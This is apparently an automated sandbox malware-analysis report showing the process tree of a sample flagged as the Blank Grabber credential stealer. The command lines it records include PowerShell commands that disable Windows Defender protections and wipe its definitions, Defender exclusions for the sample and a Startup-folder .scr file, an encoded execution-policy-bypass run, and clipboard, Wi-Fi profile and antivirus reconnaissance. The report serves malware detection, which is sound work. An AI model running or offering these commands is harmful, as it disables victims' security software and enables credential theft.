                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\9g9LZNE4bH.exe"
                                                                                                                                                                                                                                      Imagebase:0x7ff78da50000
                                                                                                                                                                                                                                      File size:7'186'035 bytes
                                                                                                                                                                                                                                      MD5 hash:03BB5937FB7B74837DA488B2278D0811
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2028897385.000001A5F3614000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2028897385.000001A5F3616000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                      Start time:03:41:58
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\9g9LZNE4bH.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\9g9LZNE4bH.exe"
                                                                                                                                                                                                                                      Imagebase:0x7ff78da50000
                                                                                                                                                                                                                                      File size:7'186'035 bytes
                                                                                                                                                                                                                                      MD5 hash:03BB5937FB7B74837DA488B2278D0811
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2395753264.000001F12B202000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2396649299.000001F12B202000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2395270624.000001F12B657000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2400386354.000001F12B208000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                      Start time:03:42:00
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                      Start time:03:42:00
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:03:42:00
Start date:04/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:03:42:00
Start date:04/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:03:42:01
Start date:04/01/2025
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:03:42:01
Start date:04/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
Imagebase:0x7ff7484e0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:03:42:01
Start date:04/01/2025
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:03:42:01
Start date:04/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:03:42:01
Start date:04/01/2025
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:03:42:02
Start date:04/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:0x7ff7484e0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:03:42:02
Start date:04/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:0x7ff7484e0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:14
Start time:03:42:02
Start date:04/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                                      Start time:03:42:02
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                      Start time:03:42:02
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                      Imagebase:0x7ff642e70000
                                                                                                                                                                                                                                      File size:106'496 bytes
                                                                                                                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                      Start time:03:42:02
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                      Imagebase:0x7ff642e70000
                                                                                                                                                                                                                                      File size:106'496 bytes
                                                                                                                                                                                                                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:18
                                                                                                                                                                                                                                      Start time:03:42:04
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                                                                      Start time:03:42:04
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:20
                                                                                                                                                                                                                                      Start time:03:42:04
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                      Start time:03:42:04
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                                                                      Start time:03:42:04
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 03:42:04
Start date: 04/01/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase: 0x7ff7484e0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 03:42:04
Start date: 04/01/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase: 0x7ff7484e0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 03:42:04
Start date: 04/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 03:42:04
Start date: 04/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 03:42:04
Start date: 04/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6d64d0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 28
Start time: 03:42:05
Start date: 04/01/2025
Path: C:\Windows\System32\tasklist.exe
Wow64 process (32bit): false
Commandline: tasklist /FO LIST
Imagebase: 0x7ff642e70000
File size: 106'496 bytes
MD5 hash: D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 29
Start time: 03:42:05
Start date: 04/01/2025
Path: C:\Windows\System32\tree.com
Wow64 process (32bit): false
Commandline: tree /A /F
Imagebase: 0x7ff7dc7a0000
File size: 20'992 bytes
MD5 hash: 9EB969EF56718A6243BF60350CD065F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 30
Start time: 03:42:05
Start date: 04/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell Get-Clipboard
Imagebase: 0x7ff7be880000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 31
Start time: 03:42:05
Start date: 04/01/2025
Path: C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit): false
Commandline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase: 0x7ff69e180000
File size: 576'000 bytes
MD5 hash: C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 32
Start time: 03:42:05
Start date: 04/01/2025
Path: C:\Windows\System32\netsh.exe
Wow64 process (32bit): false
Commandline: netsh wlan show profile
Imagebase: 0x7ff6338c0000
File size: 96'768 bytes
MD5 hash: 6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 34
Start time: 03:42:08
Start date: 04/01/2025
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase: 0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:35
                                                                                                                                                                                                                                      Start time:03:42:08
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:36
                                                                                                                                                                                                                                      Start time:03:42:08
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                      Imagebase:0x7ff7484e0000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:37
                                                                                                                                                                                                                                      Start time:03:42:08
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:38
                                                                                                                                                                                                                                      Start time:03:42:08
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:39
                                                                                                                                                                                                                                      Start time:03:42:08
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:40
                                                                                                                                                                                                                                      Start time:03:42:08
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:systeminfo
                                                                                                                                                                                                                                      Imagebase:0x7ff647f20000
                                                                                                                                                                                                                                      File size:110'080 bytes
                                                                                                                                                                                                                                      MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:41
                                                                                                                                                                                                                                      Start time:03:42:08
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                      Imagebase:0x7ff7dc7a0000
                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:42
                                                                                                                                                                                                                                      Start time:03:42:08
                                                                                                                                                                                                                                      Start date:04/01/2025
                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
